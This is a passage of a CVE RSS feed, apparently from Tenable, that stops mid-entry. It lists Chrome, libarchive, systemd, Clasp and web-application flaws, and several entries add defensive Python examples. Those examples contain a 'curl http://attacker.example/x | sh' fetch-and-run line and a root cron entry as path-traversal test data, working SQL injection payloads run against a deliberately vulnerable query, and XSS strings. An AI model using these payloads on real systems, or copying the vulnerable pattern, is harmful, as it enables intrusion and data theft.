<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Updated CVEs from Tenable</title>
        <link>https://www.tenable.com/cve/feeds?sort=updated</link>
        <description>Get the latest CVE updates from Tenable</description>
        <lastBuildDate>Tue, 17 Mar 2026 11:07:44 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>Tenable CVEs</generator>
        <image>
            <title>Updated CVEs from Tenable</title>
            <url>https://www.tenable.com/themes/custom/tenable/img/favicons/apple-touch-icon.png</url>
            <link>https://www.tenable.com/cve/feeds?sort=updated</link>
        </image>
        <copyright>Copyright 2026 Tenable, Inc. All rights reserved.</copyright>
        <atom:link href="https://www.tenable.com/cve/feeds?sort=updated" rel="self" type="application/rss+xml"/>
        <item>
            <title><![CDATA[CVE-2026-3981]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3981</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3981</guid>
            <pubDate>Thu, 12 Mar 2026 05:16:14 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A vulnerability was found in itsourcecode Online Doctor Appointment System 1.0 in an unknown function of the file /admin/doctor_action.php. Manipulation of the argument ID results in SQL injection. The attack can be launched remotely. A public exploit is available.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3981">https://www.tenable.com/cve/CVE-2026-3981</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3980]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3980</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3980</guid>
            <pubDate>Thu, 12 Mar 2026 05:16:13 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A vulnerability has been found in itsourcecode Online Doctor Appointment System 1.0 in an unknown function of the file /admin/patient_action.php. Manipulation of the argument patient_id leads to SQL injection. The attack may be launched remotely. A public exploit is available.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3980">https://www.tenable.com/cve/CVE-2026-3980</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3940]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3940</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3940</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:36 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Insufficient policy enforcement in DevTools in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3940">https://www.tenable.com/cve/CVE-2026-3940</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3939]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3939</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3939</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:36 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Insufficient policy enforcement in PDF in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted PDF file. (Chromium security severity: Low)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3939">https://www.tenable.com/cve/CVE-2026-3939</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3934]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3934</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3934</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:36 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Insufficient policy enforcement in ChromeDriver in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3934">https://www.tenable.com/cve/CVE-2026-3934</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3932]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3932</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3932</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Insufficient policy enforcement in PDF in Google Chrome on Android prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3932">https://www.tenable.com/cve/CVE-2026-3932</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3930]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3930</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3930</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Unsafe navigation in Navigation in Google Chrome on iOS prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3930">https://www.tenable.com/cve/CVE-2026-3930</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28509]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28509</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28509</guid>
            <pubDate>Fri, 06 Mar 2026 05:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>LangBot is a global IM bot platform designed for LLMs. Prior to version 4.8.7, LangBot’s web UI renders user-supplied raw HTML using rehypeRaw, which can lead to a cross-site scripting (XSS) vulnerability. This issue has been patched in version 4.8.7.</p>
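      <p>The fix for this class of bug is to stop rendering raw HTML and instead pass it through an allowlist sanitizer (in the rehype ecosystem that is rehype-sanitize). The block below is an added example, not LangBot's code: it implements the same allowlist idea in Python with the standard-library HTML parser so it runs stand-alone. The tag and attribute sets and the URL scheme list are assumptions chosen for illustration, not LangBot's policy. It keeps only allowlisted tags, drops every attribute that is not explicitly allowed (so onclick=, onerror=, style= and srcdoc= never survive), drops script and style content entirely, and rejects javascript: and data: hrefs even when disguised with case or embedded tabs.</p>

```python
from html import escape
from html.parser import HTMLParser

# Added example, not LangBot's code. Allowlists below are assumptions for
# illustration; a real deployment would tune them to the markup it needs.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "code", "pre",
                "ul", "ol", "li", "blockquote", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
DROP_CONTENT = {"script", "style"}   # tag and its text are both discarded


def _safe_href(value: str) -> bool:
    # Browsers ignore tabs/newlines inside a scheme, so strip them first,
    # then compare case-insensitively: "JaVa\tScRiPt:" is still javascript:.
    v = "".join(ch for ch in (value or "") if ch not in "\t\r\n").strip().lower()
    if v.startswith(("/", "#")) or ":" not in v:
        return True          # same-origin relative link, no scheme at all
    return v.startswith(SAFE_SCHEMES)


class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self._out: list[str] = []
        self._drop = 0       # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._drop += 1
            return
        if self._drop or tag not in ALLOWED_TAGS:
            return           # unknown tag dropped, its text content kept
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue     # drops onclick=, onerror=, style=, srcdoc=, ...
            if name == "href" and not _safe_href(value):
                continue
            parts.append(f'{name}="{escape(value or "", quote=True)}"')
        self._out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._drop = max(0, self._drop - 1)
            return
        if self._drop or tag not in ALLOWED_TAGS or tag == "br":
            return
        self._out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop:
            # Text is re-escaped on output, so "&lt;script&gt;" stays text.
            self._out.append(escape(data, quote=False))

    def result(self) -> str:
        return "".join(self._out)


def sanitize(raw_html: str) -> str:
    """Return an HTML string containing only allowlisted tags/attributes."""
    parser = AllowlistSanitizer()
    parser.feed(raw_html)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # Constructed payloads of the kind a chat message could carry.
    print(sanitize('<p onclick="x()">Hi <b>there</b><script>alert(1)</script></p>'))
    print(sanitize('<a href="javascript:alert(1)">x</a>'))
    print(sanitize("<img src=x onerror=alert(1)>"))
```

      <p>The design choice worth noting is that the sanitizer re-serialises from a parsed tree rather than pattern-matching on the raw string, which is what defeats the usual regex bypasses (attribute values with unusual quoting, entities in a scheme, unterminated tags). Unknown tags lose their markup but keep their text, so a stray &lt;div&gt; in a message degrades gracefully instead of vanishing.</p>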

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28509">https://www.tenable.com/cve/CVE-2026-28509</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-54236]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-54236</link>
            <guid>https://www.tenable.com/cve/CVE-2025-54236</guid>
            <pubDate>Tue, 09 Sep 2025 14:15:46 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, raising the confidentiality and integrity impact to high. Exploitation of this issue does not require user interaction.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-54236">https://www.tenable.com/cve/CVE-2025-54236</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-4111]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-4111</link>
            <guid>https://www.tenable.com/cve/CVE-2026-4111</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:13 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.</p>
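      <p>Because the malformed archive is indistinguishable from a valid one before decompression starts, the practical defence for a service that auto-processes uploads is to run the archive step in a child process with hard resource caps, so a spinning decompressor is killed instead of pinning a worker forever. The block below is an added example, not libarchive code: a Python one-liner stands in for the extraction command so it runs offline, and it assumes a POSIX host (the resource module). RLIMIT_CPU is the limit that matters for this CVE, since the loop never blocks and a plain wall-clock timeout on an idle socket would not see it; the wall-clock timeout and the address-space cap are added because they catch the neighbouring failure modes (a hang that burns no CPU, a decompression bomb).</p>

```python
import resource
import signal
import subprocess
import sys

# Added example, not libarchive code. Assumes a POSIX host.


def _apply_limits(cpu_seconds: int, mem_bytes: int) -> None:
    """Runs in the child right before exec. RLIMIT_CPU delivers SIGXCPU at the
    soft limit and SIGKILL at the hard limit, so a spinning decompressor dies
    even though it never blocks; RLIMIT_AS bounds a decompression bomb."""
    resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds + 1))
    resource.setrlimit(resource.RLIMIT_AS, (mem_bytes, mem_bytes))


def run_guarded(cmd: list[str], cpu_seconds: int = 2, wall_seconds: float = 10.0,
                mem_bytes: int = 1 << 30) -> str:
    """Run `cmd` (the untrusted-archive step) in a child with CPU, memory and
    wall-clock caps. Returns "ok", "cpu-limit", "timeout" or "error"."""
    try:
        proc = subprocess.run(
            cmd,
            preexec_fn=lambda: _apply_limits(cpu_seconds, mem_bytes),
            timeout=wall_seconds,      # subprocess.run kills the child on expiry
            capture_output=True,
        )
    except subprocess.TimeoutExpired:
        return "timeout"
    if proc.returncode == 0:
        return "ok"
    # A negative return code is the number of the signal that killed the child.
    if proc.returncode in (-signal.SIGXCPU, -signal.SIGKILL):
        return "cpu-limit"
    return "error"


# Constructed stand-ins: a well-formed archive, a CVE-2026-4111-style spin,
# and a hang that burns no CPU (which only the wall-clock limit catches).
QUICK_CMD = [sys.executable, "-c", "import sys; sys.exit(0)"]
SPIN_CMD = [sys.executable, "-c", "while True: pass"]
SLEEP_CMD = [sys.executable, "-c", "import time; time.sleep(60)"]

if __name__ == "__main__":
    print("quick:", run_guarded(QUICK_CMD))
    print("spin: ", run_guarded(SPIN_CMD, cpu_seconds=1))
    print("sleep:", run_guarded(SLEEP_CMD, wall_seconds=1))
```

      <p>In a real service the command would be the extraction tool (or a worker that links libarchive), the caps would be sized to the largest legitimate archive, and a "cpu-limit" result should be logged with the upload's hash: an archive that passes checksum validation and still hits the CPU cap is a strong detection signal for this bug, not a transient error to retry.</p>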

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-4111">https://www.tenable.com/cve/CVE-2026-4111</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-4105]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-4105</link>
            <guid>https://www.tenable.com/cve/CVE-2026-4105</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:13 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-4105">https://www.tenable.com/cve/CVE-2026-4105</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-4092]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-4092</link>
            <guid>https://www.tenable.com/cve/CVE-2026-4092</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:13 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A path traversal vulnerability in Clasp versions before 3.2.0 allows a remote attacker to achieve remote code execution via a malicious Google Apps Script project containing specially crafted filenames with directory traversal sequences.</p>
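      <p>The exposure here is the usual one for tools that pull a project from a remote service: the server chooses the file names, and the client uses them to decide where on the local disk to write. The block below is an added example, not Clasp's code, showing the destination check such a pull step needs. It rejects a name lexically (NUL, absolute paths, drive letters, ".." segments, backslashes treated as separators) and then again on the resolved path, which also catches an escape through a symlink that already sits inside the project directory. The project listing in run_demo() is constructed for the demonstration.</p>

```python
import re
import tempfile
from pathlib import Path, PurePosixPath

# Added example, not Clasp's code.


class UnsafeFileName(ValueError):
    pass


_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def safe_destination(root: Path, remote_name: str) -> Path:
    """Map a remote file name onto a path under `root`, or raise UnsafeFileName.

    Layer 1 checks the name as received; layer 2 checks where it actually
    resolves, so a symlink inside root cannot redirect the write either."""
    if "\x00" in remote_name:
        raise UnsafeFileName("NUL byte in name")
    # Treat backslashes as separators: a cross-platform client must assume the
    # remote side may target a Windows checkout with "..\\..\\x".
    pure = PurePosixPath(remote_name.replace("\\", "/"))
    if not pure.parts or pure.is_absolute() or _DRIVE_RE.match(pure.parts[0]):
        raise UnsafeFileName(f"absolute or empty name: {remote_name!r}")
    if ".." in pure.parts:
        raise UnsafeFileName(f"traversal segment in name: {remote_name!r}")
    root_resolved = root.resolve()
    dest = (root_resolved / pure).resolve()   # follows existing symlinks
    if root_resolved not in dest.parents:
        raise UnsafeFileName(f"resolves outside root: {remote_name!r}")
    return dest


def write_project(root: Path, files: dict[str, str]) -> tuple[list[str], list[str]]:
    """Write each file under root; return (written relative paths, rejected names)."""
    written, rejected = [], []
    for name, content in files.items():
        try:
            dest = safe_destination(root, name)
        except UnsafeFileName:
            rejected.append(name)
            continue
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_text(content)
        written.append(dest.relative_to(root.resolve()).as_posix())
    return sorted(written), rejected


def run_demo() -> tuple[list[str], list[str]]:
    """Constructed listing mixing benign names with the traversal forms an
    attacker would send, plus a symlink inside root that points outside it."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        outside = base / "outside"
        root = base / "project"
        outside.mkdir()
        root.mkdir()
        (root / "link").symlink_to(outside, target_is_directory=True)
        files = {
            "Code.js": "function main() {}",
            "lib/util.js": "export const x = 1;",
            "../../.bashrc": "curl http://attacker.example/x | sh",
            "/etc/cron.d/job": "* * * * * root /tmp/x",
            "..\\..\\evil.js": "",
            "link/escape.txt": "would land outside the project dir",
        }
        return write_project(root, files)


if __name__ == "__main__":
    print(run_demo())
```

      <p>The second layer is the one most implementations skip: after a first sync has written a symlink (or the user created one), "link/escape.txt" passes every lexical test and still lands outside the project, so the check has to be against the resolved path and it has to be repeated for every file rather than once per directory.</p>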

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-4092">https://www.tenable.com/cve/CVE-2026-4092</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-4063]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-4063</link>
            <guid>https://www.tenable.com/cve/CVE-2026-4063</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:13 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>The Social Icons Widget & Block by WPZOOM plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the add_menu_item() method hooked to admin_menu in all versions up to, and including, 4.5.8. This is due to the method performing wp_insert_post() and update_post_meta() calls to create a sharing configuration without verifying the current user has administrator-level capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the creation of a published wpzoom-sharing configuration post with default sharing button settings, which causes social sharing buttons to be automatically injected into all post content on the frontend via the the_content filter.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-4063">https://www.tenable.com/cve/CVE-2026-4063</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-4014]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-4014</link>
            <guid>https://www.tenable.com/cve/CVE-2026-4014</guid>
            <pubDate>Thu, 12 Mar 2026 08:16:12 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A security flaw has been discovered in itsourcecode Cafe Reservation System 1.0 in an unknown function of the file /curvus2/signup.php of the component Registration. Manipulation of the argument Username results in SQL injection. The attack can be launched remotely. A public exploit is available.</p>
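      <p>CVE-2026-3981 (argument ID), CVE-2026-3980 (argument patient_id) and CVE-2026-4014 (argument Username) are the same bug three times: a request parameter is spliced into the SQL text. The block below is an added example, not the itsourcecode code base, written against an in-memory SQLite database with constructed rows so it runs offline. It shows the numeric case (where `1 OR 1=1` widens the query and a UNION pulls a column the page never displays) beside the string case from the signup form (where a quote breaks out of the literal), and the hardened form of each: a type check where the input is supposed to be a number, and a bound parameter in both cases so the SQL text never changes with the input.</p>

```python
import re
import sqlite3

# Added example, not the itsourcecode code base. Schema and rows are
# constructed stand-ins for an appointment/reservation application.


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patients (patient_id INTEGER PRIMARY KEY, name TEXT, ssn TEXT)")
    conn.executemany(
        "INSERT INTO patients VALUES (?, ?, ?)",
        [(1, "Ada", "111-11-1111"), (2, "Bob", "222-22-2222"), (3, "Cy", "333-33-3333")],
    )
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO users VALUES (?)", [("admin",), ("alice",)])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, patient_id: str) -> list[tuple]:
    """The pattern behind the CVEs: the request argument becomes SQL text,
    so whatever the attacker sends is parsed as SQL, not treated as a value."""
    sql = f"SELECT patient_id, name FROM patients WHERE patient_id = {patient_id}"
    return conn.execute(sql).fetchall()


_ID_RE = re.compile(r"[0-9]{1,18}")   # decimal digits only; "1 OR 1=1" cannot match


def lookup_safe(conn: sqlite3.Connection, patient_id: str) -> list[tuple]:
    """Hardened form: reject anything that is not a plain integer, then bind
    the value as a parameter. Either measure alone would stop the payloads
    below; together they also give a clean error instead of a 500."""
    if not _ID_RE.fullmatch(patient_id):
        raise ValueError("patient_id must be a decimal integer")
    sql = "SELECT patient_id, name FROM patients WHERE patient_id = ?"
    return conn.execute(sql, (int(patient_id),)).fetchall()


def signup_check_vulnerable(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """String variant (signup.php): a single quote in the input closes the
    literal and the rest of the payload becomes part of the WHERE clause."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def signup_check_safe(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """For free-form text there is no type check to lean on; the bound
    parameter is the whole defence, and quotes in it are just characters."""
    sql = "SELECT username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, "1 OR 1=1"))                                   # every row
    print(lookup_vulnerable(db, "0 UNION SELECT patient_id, ssn FROM patients"))  # hidden column
    print(signup_check_vulnerable(db, "x' OR '1'='1"))                          # every user
    print(signup_check_safe(db, "x' OR '1'='1"))                                # []
```

      <p>Note that escaping quotes is not a substitute for the numeric check in the ID case: the vulnerable query has no quotes around the value, so a payload like `1 OR 1=1` contains nothing to escape.</p>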

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-4014">https://www.tenable.com/cve/CVE-2026-4014</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3999]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3999</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3999</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:13 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A broken access control may allow an authenticated user to perform a horizontal privilege escalation. The vulnerability only impacts specific configurations.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3999">https://www.tenable.com/cve/CVE-2026-3999</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3986]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3986</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3986</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:12 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form settings in all versions up to, and including, 5.4.5.0. This is due to insufficient capability checks on the form settings save handler and insufficient input sanitization of the `fcontent` field in `fhtml` field types. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3986">https://www.tenable.com/cve/CVE-2026-3986</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3942]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3942</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3942</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:36 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Incorrect security UI in PictureInPicture in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3942">https://www.tenable.com/cve/CVE-2026-3942</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3941]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3941</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3941</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:36 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Insufficient policy enforcement in DevTools in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3941">https://www.tenable.com/cve/CVE-2026-3941</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3936]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3936</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3936</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:36 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in WebView in Google Chrome on Android prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3936">https://www.tenable.com/cve/CVE-2026-3936</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3931]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3931</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3931</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Heap buffer overflow in Skia in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3931">https://www.tenable.com/cve/CVE-2026-3931</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3929]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3929</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3929</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>Side-channel information leakage in ResourceTiming in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3929">https://www.tenable.com/cve/CVE-2026-3929</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3927]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3927</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3927</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Incorrect security UI in PictureInPicture in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3927">https://www.tenable.com/cve/CVE-2026-3927</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3926]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3926</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3926</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out of bounds read in V8 in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3926">https://www.tenable.com/cve/CVE-2026-3926</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3925]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3925</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3925</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Incorrect security UI in LookalikeChecks in Google Chrome on Android prior to 146.0.7680.71 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3925">https://www.tenable.com/cve/CVE-2026-3925</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3924]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3924</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3924</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in WindowDialog in Google Chrome prior to 146.0.7680.71 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3924">https://www.tenable.com/cve/CVE-2026-3924</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3923]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3923</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3923</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in WebMIDI in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

